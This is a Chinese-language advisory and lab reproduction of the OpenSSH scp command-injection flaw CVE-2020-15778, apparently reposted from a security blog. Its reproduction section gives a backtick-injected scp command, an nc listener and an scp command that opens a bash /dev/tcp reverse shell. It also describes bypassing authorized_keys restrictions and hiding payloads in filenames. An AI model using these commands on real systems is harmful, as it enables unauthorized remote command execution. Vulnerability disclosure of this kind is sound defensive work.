一、漏洞概要

2020年6月9日，研究人員Chinmay Pandya在Openssh中發現了一個漏洞，于7月18日公開。OpenSSH的8.3p1中的scp允許在scp.c遠程功能中注入命令，攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。深信服安全研究團隊依據漏洞重要性和影響力進行評估，作出漏洞通告。

二、漏洞分析

2.1?OpenSSH介紹

OpenSSH是用于使用SSH協議進行遠程登錄的一個開源實現。通過對交互的流量進行加密防止竊聽，連接劫持以及其他攻擊。OpenSSH由OpenBSD項目的一些開發人員開發， 并以BSD樣式的許可證提供，且已被集成到許多商業產品中。

2.2?漏洞描述

研究人員Chinmay Pandya在openssh的scp組件中發現了一個命令注入漏洞。OpenSSH的8.3p1中的scp允許在scp.c遠程功能中注入命令，攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。

2.2.1 scp命令簡介

scp 是 secure copy 的縮寫。在linux系統中，scp用于linux之間復制文件和目錄，基于 ssh 登陸進行安全的遠程文件拷貝命令。該命令由openssh的scp.c及其他相關代碼實現。

2.2.2 漏洞復現

查看ssh版本吧

ssh -V

首先嘗試一下利用scp命令，用kali對centOS進行寫文件，復制文件。

scp 1.txt root@192.168.110.153:'`touch /tmp/test.txt` /tmp'

成功將kali上面的文件傳入道centOS上面，和自己創建了文件。

?

直接進行nc反彈獲取shell

先監聽一個端口

nc -lvvp 7777

進行反彈shell

scp test.txt root@192.168.110.153:'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt'

利用方案

• 對于用戶來說，ssh被阻止，但authorized_keys文件中的命令選項允許使用scp的情況。您可以繞過此限制并在遠程服務器上執行命令。
• SCP支持帶有“ -r”選項的目錄傳輸。由于linux允許在文件名中使用反引號（`）。攻擊者可以在文件名中創建有效載荷，并且當受害者將完整文件夾復制到遠程服務器時，將執行文件名中的有效載荷。

總結

該漏洞復現簡單，漏洞等級 嚴重。復現需要知道ssh密碼，主要針對知道ssh密碼卻不給登錄，這樣就可進行反彈shell獲取權限了。

?

參考：

https://www.cnblogs.com/hcrk/p/13495626.html

https://www.freebuf.com/vuls/245225.html

https://github.com/cpandya2909/CVE-2020-15778/

總結

以上是生活随笔為你收集整理的OpenSSH 命令注入漏洞通告（CVE-2020-15778，Openssh ＜=8.3p1）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。